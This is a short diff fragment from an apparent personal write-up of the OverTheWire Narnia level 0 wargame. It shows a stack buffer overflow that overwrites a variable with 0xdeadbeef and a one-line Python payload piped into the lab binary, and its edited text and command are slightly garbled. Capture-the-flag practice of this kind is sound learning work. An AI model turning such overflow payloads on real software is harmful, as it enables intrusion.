sahiilll/Wargames/OverTheWire/Narnia 0/Readme.md

 Here is your chance: buf: AAAAAAAAAAAAAAAAAAAAï¾­Þ
 val: 0xdeadbeef
 ```
-Damn!!!
-I successfully overwrite the val varible with “0xdeadbeef” but I was not given a shell, this is because the shell closes straight away.
+DI successfully overwrite the val varible with “0xdeadbeef” but I was not given a shell, this is because the shell closes straight away.

 ```
 narnia0@melinda:~$ python -c'print "A"*20 + "\xef\xbe\xad\xde"';id | /narnia/narnia0